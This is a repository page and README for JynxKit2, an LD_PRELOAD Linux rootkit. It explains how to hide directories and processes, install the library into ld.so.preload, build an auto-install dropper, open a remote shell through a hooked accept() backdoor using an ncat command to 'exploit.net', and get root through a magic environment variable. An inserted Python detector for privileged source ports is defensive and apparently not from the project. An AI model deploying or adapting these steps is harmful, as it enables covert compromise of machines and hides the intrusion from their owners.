• Stars: 158
  • Rank 237,131 (Top 5 %)
  • Language: C
  • Created almost 12 years ago
  • Updated almost 12 years ago

Repository Details

JynxKit2 is an LD_PRELOAD userland rootkit based on the original JynxKit. The backdoor has been replaced with an "accept()" system hook.
                _   _,.-.' .-.
            _ .' |,'   ."".| |.""._
           ( || ,',"". `._`' `  '  `.
           `\ | `" .-"`-..`     .    `.
            |     `..--.._       |     \
          _,|      _...'_.'     ,+.     `.
     ,""'|   `...-'..""(__.._ -"   `"--.. `.
    |`._,'  ,'  /\ .'""` .'""`. `.    |  `. \
    '      / / /  ||    ||    |.`.`.   .   | \
     `.__,'-._'  /|` -"'  `-.'  \ \ \   `"-'  \
      ' `.   /  /_| | |'""| | .-""'`'"`-,.-"\  .
     . / .\ .  /  | | `._.' ||        ,'     \  \
    ' / / |/  /_.-+._`-..--"-.       .   .    \  `
   / /.'  '  ,'""'-. `"."'""'`..     |.        \  \
  / . |  j  .       . |        |\__," |.  `    '   \
 .  | |  |  |       ' |        '|   | ' `  \    \   .
 |    |  |  `.____,'   ..____,' |   |    .       \
 |    |  |  | ._  _..---._   _,'    |       .        '
 |    |  |  | | ""  .    |`"'   \ `.|     '  '  '     .
 |    |  |  | |     |    |       `  `      .  .  \    |
 |    |  |  | |     '    |        \  `.    |  |   .   |
 '    '  |  | |      .   `         \   \   |  |   |   |
  \      `  | |      |              .   `. |  |   |   |
   \      \ ' |      `    '          `    `+..|___|___|_........
    \      \ \|       '    .           `.    `.                 |
     `.     \ .        .   `             `.    `-.            .'
    _,'`.    \'         .   \              `-.._  `._       ,'
 _."     `._ `.`        |    .                       `._   .
`._       _,`"--`.      |     .                         `. |
   `-._ ,'              |      `.                         `|_
      ,'         |      |        `.                          `.
    .'   __...__.|      |          \ __..._     _,..,.__       `.
    `-`"'        `._..--'-.__      .'      `-..'        ``'"--..-'
                             `"---' 
			     
			     
    /$$$$$                                      /$$   /$$ /$$   /$$    
   |__  $$                                     | $$  /$$/|__/  | $$    
      | $$ /$$   /$$ /$$$$$$$  /$$   /$$       | $$ /$$/  /$$ /$$$$$$  
      | $$| $$  | $$| $$__  $$|  $$ /$$//$$$$$$| $$$$$/  | $$|_  $$_/  
 /$$  | $$| $$  | $$| $$  \ $$ \  $$$$/|______/| $$  $$  | $$  | $$    
| $$  | $$| $$  | $$| $$  | $$  >$$  $$        | $$\  $$ | $$  | $$ /$$
|  $$$$$$/|  $$$$$$$| $$  | $$ /$$/\  $$       | $$ \  $$| $$  |  $$$$/
 \______/  \____  $$|__/  |__/|__/  \__/       |__/  \__/|__/   \___/  
           /$$  | $$                                                   
          |  $$$$$$/                                                   
           \______/            


	               BlackHatAcademy.org
		          ErrProne / XO
		     
File list: config.h jynx2.c reality.c Makefile packer.sh README

0x01. Setting up config.h.

	First of all, you need to dig into config.h, and ensure that the settings meet your needs.
MAGIC_STRING should be changed to the name of the directory you want to hide from the system. This can
be used as a prefix to your main directory as well as for files. MAGIC_GID will be the Group ID to
hide as well. Make sure that you set MAGIC_DIR Group ID to MAGIC_GID for hiding purposes as well.
This will help disguise the processes from the system, including commands like ps. CONFIG_FILE 
defaults to ld.so.preload, which is usually located in /etc. You shouldn't have to change this 
unless you're going to dig a little deeper into hiding Jynx-Kit. MAGIC_ACK and MAGIC_SEQ have been
dropped in Jynx2, since the new backdoor hooks the accept() system call; SSL support is still included.
After installing Jynx2, ensure that you restart the daemon that you want to use as the backdoor. 

0x02. The accept backdoor.

	LOW_PORT and HIGH_PORT make up the first part of the new two-factor authentication. The source
port of your connecting client must fall within this port range, and since you have to be root in order
to use this port range, it ensures that no random connection will match this criterion. SHELL_PASSWORD
will be the password used for the second factor of authentication, and should be the first line sent to
the backdoor upon connecting. For instance, say we have port 80 backdoored. Our client will connect like so.
Make sure you are using the ssl flag with ncat.

# sudo ncat exploit.net 80 -p 42 --ssl
DEFAULT_PASS
Bump with shell.
>ls -lia 
 214473 drwxr-xr-x  2 errprone users   176 Mar  7 19:19 .
 177137 drwxr-xr-x 15 errprone users   952 Mar  5 22:15 ..
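A defender-side check for the trigger just described, added here as an example that is not part of the JynxKit2 project: it scans `ss -tn`-style output (a constructed sample is embedded) and flags established sessions to monitored service ports whose client-side port lies in the privileged range, which normal clients never use because ephemeral ports start at 1024. The range 1-1023, the monitored port set and the file name in the usage comment are assumptions; the kit's real LOW_PORT/HIGH_PORT are whatever config.h sets.

```python
"""Flag established TCP sessions whose client-side (source) port is privileged.
Added defender's example for the Jynx2 README; not part of the JynxKit2 project.
Normal clients use ephemeral ports (>= 1024), so a session to a server port from
a port below 1024 matches the trigger the README describes and merits an alert."""
import re
import sys

# Constructed sample mimicking `ss -tn` output (not captured from a real host).
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port   Peer Address:Port
ESTAB  0      0      10.0.0.5:80          203.0.113.7:42
ESTAB  0      0      10.0.0.5:80          198.51.100.9:51234
ESTAB  0      0      10.0.0.5:22          198.51.100.9:60001
ESTAB  0      0      10.0.0.5:443         203.0.113.7:1023
ESTAB  0      0      [::ffff:10.0.0.5]:80 [::ffff:203.0.113.8]:5000
"""
# Matches "addr:port" and "[v6addr]:port"; the lazy group stops at the last colon.
ENDPOINT = re.compile(r"^\[?(?P<addr>.+?)\]?:(?P<port>\d+)$")

def split_endpoint(token):
    m = ENDPOINT.match(token)
    if not m:
        raise ValueError(f"unparseable endpoint: {token!r}")
    return m.group("addr"), int(m.group("port"))

def parse_ss(text):
    """Yield (local_addr, local_port, peer_addr, peer_port) for ESTAB rows."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "ESTAB":
            continue  # header, blank, or non-established row
        la, lp = split_endpoint(fields[3])
        pa, pp = split_endpoint(fields[4])
        yield la, lp, pa, pp

def suspicious_sessions(text, service_ports, low=1, high=1023):
    """Sessions to a monitored service port whose peer port lies in [low, high].
    The default range is an assumption: the README says the trigger range needs
    root, i.e. ports below 1024; the actual LOW_PORT/HIGH_PORT live in config.h.
    Returns (peer_addr, peer_port, local_addr, local_port) tuples."""
    return [(pa, pp, la, lp) for la, lp, pa, pp in parse_ss(text)
            if lp in service_ports and low <= pp <= high]

if __name__ == "__main__":
    # Pipe real output in with: ss -tn | python3 lowport_check.py
    data = SAMPLE_SS if sys.stdin.isatty() else sys.stdin.read()
    for pa, pp, la, lp in suspicious_sessions(data, {22, 80, 443}):
        print(f"ALERT privileged source port: {pa}:{pp} -> {la}:{lp}")
```

On a host where the preload library hides its own sessions from hooked tools, run the check from a clean boot medium or compare against a network-side flow record rather than trusting local `ss` output alone.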

0x03. Drop a local suid shell.

	A new feature is also being able to drop a local suid shell using ENV_VARIABLE, set in config.h.
To drop a shell, simply set the defined environment variable, and make a call to a program with an euid of 0.
For instance, you can do the following.

# XxJynx=hahahax sudo
# whoami
root

0x04. Configuring Makefile and Installing.

	Once you have this configured, go ahead and open up Makefile. Make sure that MAGIC_GID 
matches what you have in config.h. INSTALL should be set to the directory that you want to hide
your files in. You can also set these variables upon calling "make install." See examples below.

# make all                                   # compile jynx2.so
# make install                               # installs jynx2, injects into ld.so.preload, and sets correct GIDs
# make install INSTALL=/omgxochi MAGIC_GID=100

	The last line installs the kit to /omgxochi, and sets the GID to 100. You should use a GID
of 100 for anything that you're going to run and need to hide from the system.


0x05. packer.sh

	Now that you have everything configured and things compile correctly, you can use packer.sh
in order to create an auto-install shell script for future installations. Simply remove the last 2 lines
from config.h, run packer.sh, and it will generate a new autokit.sh. ONLY RUN autokit.sh ON THE SYSTEM
YOU WANT TO INJECT.
